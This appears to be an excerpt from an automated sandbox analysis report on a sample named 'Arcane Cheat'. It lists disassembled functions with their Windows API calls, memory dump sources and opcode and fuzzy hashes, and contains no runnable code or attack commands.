                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: H_prolog
                                  • String ID:
                                  • API String ID: 3519838083-0
                                  • Opcode ID: c38deec1f285bf8cd03742e9f453a9903982e2e1e6b77aa20bcf6a5881bbb00f
                                  • Instruction ID: 83ac97b1b6ca59ff58209efa825bf83f4cadcb0402d3bd582f2fb5d30227ce41
                                  • Opcode Fuzzy Hash: c38deec1f285bf8cd03742e9f453a9903982e2e1e6b77aa20bcf6a5881bbb00f
                                  • Instruction Fuzzy Hash: DE4127B0805B409ED724DF7984859E7FBE5FB28300F504A2ED6EEC3282DB326554CB56
                                  Function 00821380 Relevance: 3.1, APIs: 2, Instructions: 95COMMON
                                  Download Yara Rule
                                  APIs
                                  • __EH_prolog.LIBCMT ref: 00821385
                                    • Part of subcall function 00826057: __EH_prolog.LIBCMT ref: 0082605C
                                    • Part of subcall function 0082C827: __EH_prolog.LIBCMT ref: 0082C82C
                                    • Part of subcall function 0082C827: new.LIBCMT ref: 0082C86F
                                    • Part of subcall function 0082C827: new.LIBCMT ref: 0082C893
                                  • new.LIBCMT ref: 008213FE
                                    • Part of subcall function 0082B07D: __EH_prolog.LIBCMT ref: 0082B082
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: H_prolog
                                  • String ID:
                                  • API String ID: 3519838083-0
                                  • Opcode ID: f6e11d456df0fe06e89dae76ffdb013db63f7a4355275a66211ce89c3563bcbf
                                  • Instruction ID: a11eeca008609cbdf72401c16e76782659accbfd2b018b35aeefd9d3e2f434cb
                                  • Opcode Fuzzy Hash: f6e11d456df0fe06e89dae76ffdb013db63f7a4355275a66211ce89c3563bcbf
                                  • Instruction Fuzzy Hash: 6841F6B0805B409ED724DF7984859E7FAE5FB28300F504A6ED6EEC3282DB326554CB56
                                  Function 0084B188 Relevance: 3.1, APIs: 2, Instructions: 91COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00848FA5: GetLastError.KERNEL32(?,00860EE8,00843E14,00860EE8,?,?,00843713,00000050,?,00860EE8,00000200), ref: 00848FA9
                                    • Part of subcall function 00848FA5: _free.LIBCMT ref: 00848FDC
                                    • Part of subcall function 00848FA5: SetLastError.KERNEL32(00000000,?,00860EE8,00000200), ref: 0084901D
                                    • Part of subcall function 00848FA5: _abort.LIBCMT ref: 00849023
                                    • Part of subcall function 0084B2AE: _abort.LIBCMT ref: 0084B2E0
                                    • Part of subcall function 0084B2AE: _free.LIBCMT ref: 0084B314
                                    • Part of subcall function 0084AF1B: GetOEMCP.KERNEL32(00000000,?,?,0084B1A5,?), ref: 0084AF46
                                  • _free.LIBCMT ref: 0084B200
                                  • _free.LIBCMT ref: 0084B236
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: _free$ErrorLast_abort
                                  • String ID:
                                  • API String ID: 2991157371-0
                                  • Opcode ID: 8ad8375f9cdc18894321629bba4d29861f07c95c193039defb3e84685c933ad8
                                  • Instruction ID: 819ed0a8e8caaf2c5579444ed8ae44181250d693cba7421022600702b192016b
                                  • Opcode Fuzzy Hash: 8ad8375f9cdc18894321629bba4d29861f07c95c193039defb3e84685c933ad8
                                  • Instruction Fuzzy Hash: D731DF3190420CAFDB14EFA9C841AADBBE5FF44320F254099E814DB291EBB29E41CB41
                                  Function 0082971E Relevance: 3.1, APIs: 2, Instructions: 86fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateFileW.KERNELBASE(?,00000000,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00829EDC,?,?,00827867), ref: 008297A6
                                  • CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00829EDC,?,?,00827867), ref: 008297DB
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: CreateFile
                                  • String ID:
                                  • API String ID: 823142352-0
                                  • Opcode ID: 88fd8b9132c623e3172632f7dee4d87aad482b5fe91000ee16f6ac2947867cce
                                  • Instruction ID: edc84713026ca81b234c2f13149f4c765149d6cbf8d3fc64b904c3009434bdc7
                                  • Opcode Fuzzy Hash: 88fd8b9132c623e3172632f7dee4d87aad482b5fe91000ee16f6ac2947867cce
                                  • Instruction Fuzzy Hash: 2821F3B1110758AFE7308F64D885BA7B7E8FB49764F00492DF5E5C21D1C374AC889B61
                                  Function 00829D62 Relevance: 3.1, APIs: 2, Instructions: 82timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00827547,?,?,?,?), ref: 00829D7C
                                  • SetFileTime.KERNELBASE(?,?,?,?), ref: 00829E2C
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: File$BuffersFlushTime
                                  • String ID:
                                  • API String ID: 1392018926-0
                                  • Opcode ID: 600fd2142d3811d2d057e2678e310dfaff5297b5ffd65e2260bed45bab4e15c7
                                  • Instruction ID: ac95031426162ca3bcd38922bb10f11396661301964c15578678886cb7d241ea
                                  • Opcode Fuzzy Hash: 600fd2142d3811d2d057e2678e310dfaff5297b5ffd65e2260bed45bab4e15c7
                                  • Instruction Fuzzy Hash: 3121B13114835AABC714DE24D891AAABBE4FF95744F04081CF8C1C7181D329EE4CEBA2
                                  Function 0084A458 Relevance: 3.1, APIs: 2, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • GetProcAddress.KERNEL32(00000000,?), ref: 0084A4B8
                                  • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 0084A4C5
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: AddressProc__crt_fast_encode_pointer
                                  • String ID:
                                  • API String ID: 2279764990-0
                                  • Opcode ID: fbfbaa4803bea2c1a8cc72dc102eb4d48eaa288f592f4797a9f7e1567b8ddfd2
                                  • Instruction ID: 1e8283c3923a1a2c4fb74b2c03330a5fdefca08b4ce8573c9f4116812082e1be
                                  • Opcode Fuzzy Hash: fbfbaa4803bea2c1a8cc72dc102eb4d48eaa288f592f4797a9f7e1567b8ddfd2
                                  • Instruction Fuzzy Hash: 03113633A402288B9F2EDE2CEC4486E7395FB803647164260FD16EF284EA74DC41C7D6
                                  Function 00829B59 Relevance: 3.1, APIs: 2, Instructions: 57COMMON
                                  Download Yara Rule
                                  APIs
                                  • SetFilePointer.KERNELBASE(?,?,?,?,-00001964,?,00000800,-00001964,00829B35,?,?,00000000,?,?,00828D9C,?), ref: 00829BC0
                                  • GetLastError.KERNEL32 ref: 00829BCD
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: ErrorFileLastPointer
                                  • String ID:
                                  • API String ID: 2976181284-0
                                  • Opcode ID: f404e2230993714e97cd84f21e6441f3227869f786e28effe25bf9632cd6b3c6
                                  • Instruction ID: 3e0113fb51c2baef86d825c2c4adfce5f407a7c278410481f37ac0f6d01024a2
                                  • Opcode Fuzzy Hash: f404e2230993714e97cd84f21e6441f3227869f786e28effe25bf9632cd6b3c6
                                  • Instruction Fuzzy Hash: 9C01C4323043399B8B08CE69BC9497EB399FFC5732F14452DF996C7290DA31D8859A21
                                  Function 00829E40 Relevance: 3.1, APIs: 2, Instructions: 54COMMON
                                  Download Yara Rule
                                  APIs
                                  • SetFilePointer.KERNELBASE(?,00000000,00000000,00000001), ref: 00829E76
                                  • GetLastError.KERNEL32 ref: 00829E82
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: ErrorFileLastPointer
                                  • String ID:
                                  • API String ID: 2976181284-0
                                  • Opcode ID: b8c3d4dc7ca04ec5bebea3ef1c1cb3a746fbf61753b835817ef5b4f833bc49b3
                                  • Instruction ID: 2a2732f2f764dbbd93295267878defc61d2fdc8d62ca4c5b9d5080d42bf89675
                                  • Opcode Fuzzy Hash: b8c3d4dc7ca04ec5bebea3ef1c1cb3a746fbf61753b835817ef5b4f833bc49b3
                                  • Instruction Fuzzy Hash: 51019E753043245BEB34DE69EC44B6BB6D9FB88329F15493EF186C2680DAB5EC888611
                                  Function 00848606 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • _free.LIBCMT ref: 00848627
                                    • Part of subcall function 00848518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0084C13D,00000000,?,008467E2,?,00000008,?,008489AD,?,?,?), ref: 0084854A
                                  • HeapReAlloc.KERNEL32(00000000,?,?,?,?,00860F50,0082CE57,?,?,?,?,?,?), ref: 00848663
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: Heap$AllocAllocate_free
                                  • String ID:
                                  • API String ID: 2447670028-0
                                  • Opcode ID: 2b5a76c05a5568f1ff09274146e9df56f5a1862495292b89865ed9e9efc49a2a
                                  • Instruction ID: 78f7ad769da6ebfc403c8d2fdabca145bb8237fbdd84e54f5000c05c4f301f19
                                  • Opcode Fuzzy Hash: 2b5a76c05a5568f1ff09274146e9df56f5a1862495292b89865ed9e9efc49a2a
                                  • Instruction Fuzzy Hash: C2F0F63250111DE6CBA12A69AC08F6F7B5CFFF1BB4F264116FC14D6191DF30C80155AA
                                  Function 008479B7 Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0084B610: GetEnvironmentStringsW.KERNEL32 ref: 0084B619
                                    • Part of subcall function 0084B610: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0084B63C
                                    • Part of subcall function 0084B610: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0084B662
                                    • Part of subcall function 0084B610: _free.LIBCMT ref: 0084B675
                                    • Part of subcall function 0084B610: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0084B684
                                  • _free.LIBCMT ref: 008479FD
                                  • _free.LIBCMT ref: 00847A04
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
                                  • String ID:
                                  • API String ID: 400815659-0
                                  • Opcode ID: d0245baa9a4edc1c98d0d1fb40561a49594e1ca64ee9716f69ed740bd170dcc5
                                  • Instruction ID: 6c2b2abc6cf51b30d81d8c01f4b2558d17e704472147436a3539bc14824b82d0
                                  • Opcode Fuzzy Hash: d0245baa9a4edc1c98d0d1fb40561a49594e1ca64ee9716f69ed740bd170dcc5
                                  • Instruction Fuzzy Hash: 58E02B13A0D46F01DB71B67E2C0669F0A48FF81334B110B2AF510DB0C2DF54C903015B
                                  Function 00830908 Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetCurrentProcess.KERNEL32(?,?), ref: 00830915
                                  • GetProcessAffinityMask.KERNEL32(00000000), ref: 0083091C
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: Process$AffinityCurrentMask
                                  • String ID:
                                  • API String ID: 1231390398-0
                                  • Opcode ID: 09b0b90821f0a437359713e4539768fd89f3eb970fd09ffc24a65f1a7689ffc7
                                  • Instruction ID: 2abcb8fb82bf82e2fcccb3d4ece2d2fb2659793e7b2288be1543e6ca90d999f2
                                  • Opcode Fuzzy Hash: 09b0b90821f0a437359713e4539768fd89f3eb970fd09ffc24a65f1a7689ffc7
                                  • Instruction Fuzzy Hash: 73E09B32A10209FB6F05CAB49C146BB7B9DFB84255B104179AC06D7501F534DD018EE0
                                  Function 0082A444 Relevance: 3.0, APIs: 2, Instructions: 30COMMON
                                  Download Yara Rule
                                  APIs
                                  • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0082A27A,?,?,?,0082A113,?,00000001,00000000,?,?), ref: 0082A458
                                  • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0082A27A,?,?,?,0082A113,?,00000001,00000000,?,?), ref: 0082A489
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: AttributesFile
                                  • String ID:
                                  • API String ID: 3188754299-0
                                  • Opcode ID: 65bcb47f97f69ab1bd785f826535a9381041592e2b4f34d70bf168a315462e87
                                  • Instruction ID: 8a2bb234323a18d2c874c072d88214f1cfdfd2106e0a5c69162abcbdbf193835
                                  • Opcode Fuzzy Hash: 65bcb47f97f69ab1bd785f826535a9381041592e2b4f34d70bf168a315462e87
                                  • Instruction Fuzzy Hash: 3CF08C312402197BDB026E60EC45BD9776CFF04382F448051BC88E61A1DB7ACAA8AA51
                                  Function 0083D573 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: ItemText_swprintf
                                  • String ID:
                                  • API String ID: 3011073432-0
                                  • Opcode ID: 42c9ed8b75bc74d0ff7b6f903a6850bc76636aed65247c0691366ed8293846e6
                                  • Instruction ID: 4597bc2c970aecc0135827fe77ba8e6aa097c777a65aacf385d7c618831863ce
                                  • Opcode Fuzzy Hash: 42c9ed8b75bc74d0ff7b6f903a6850bc76636aed65247c0691366ed8293846e6
                                  • Instruction Fuzzy Hash: 59F0EC7254034C7ADB11AB74EC06F99375DF704745F040655B604D30A2DE716A5047A3
                                  Function 0082A12D Relevance: 3.0, APIs: 2, Instructions: 28fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • DeleteFileW.KERNELBASE(?,?,?,0082984C,?,?,00829688,?,?,?,?,00851FA1,000000FF), ref: 0082A13E
                                  • DeleteFileW.KERNEL32(?,?,?,00000800,?,?,0082984C,?,?,00829688,?,?,?,?,00851FA1,000000FF), ref: 0082A16C
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: DeleteFile
                                  • String ID:
                                  • API String ID: 4033686569-0
                                  • Opcode ID: 5916874b903761d816da9e56c0e098c0641af05d3549b6bbc10b739af6d3d9c9
                                  • Instruction ID: d27ad9676c331646ae1b7525b597897d3e8512ef4cdad871bd82849fef5e3b6e
                                  • Opcode Fuzzy Hash: 5916874b903761d816da9e56c0e098c0641af05d3549b6bbc10b739af6d3d9c9
                                  • Instruction Fuzzy Hash: B0E09235641318BBDB119F64EC41FE9775CFF083D2F484065B888D31A0DB659DE4AA91
                                  Function 0083A39D Relevance: 3.0, APIs: 2, Instructions: 27comCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GdiplusShutdown.GDIPLUS(?,?,?,?,00851FA1,000000FF), ref: 0083A3D1
                                  • OleUninitialize.OLE32(?,?,?,?,00851FA1,000000FF), ref: 0083A3D6
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: GdiplusShutdownUninitialize
                                  • String ID:
                                  • API String ID: 3856339756-0
                                  • Opcode ID: 443a888c90caf847df038c00c4ba95d3a50f0edcb5ea92dceaea5b61fa939db6
                                  • Instruction ID: a305c00b25f8b927a874e8e0312cf93e008bdd4ce6555ae4830a0566bf59fbd1
                                  • Opcode Fuzzy Hash: 443a888c90caf847df038c00c4ba95d3a50f0edcb5ea92dceaea5b61fa939db6
                                  • Instruction Fuzzy Hash: 7DF03932618A54EFC7109B4DDC05B1AFBA8FB89B21F04436AF419C3BA0CF786800CAD1
                                  Function 0082A194 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetFileAttributesW.KERNELBASE(?,?,?,0082A189,?,008276B2,?,?,?,?), ref: 0082A1A5
                                  • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,0082A189,?,008276B2,?,?,?,?), ref: 0082A1D1
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: AttributesFile
                                  • String ID:
                                  • API String ID: 3188754299-0
                                  • Opcode ID: 5824b38078821d60d3534d3ef62586e34ceddd53a144ab6925b892a9c12542cb
                                  • Instruction ID: 50411fdc3e28c4931170f58c88e953cfc5881b94362c78ab995cc62dc582c12e
                                  • Opcode Fuzzy Hash: 5824b38078821d60d3534d3ef62586e34ceddd53a144ab6925b892a9c12542cb
                                  • Instruction Fuzzy Hash: E7E092355016285BCB20AB68EC05BD9B75CFB083F2F0042A1FD45E32D4D7749D949AE1
                                  Function 00830085 Relevance: 3.0, APIs: 2, Instructions: 25libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 008300A0
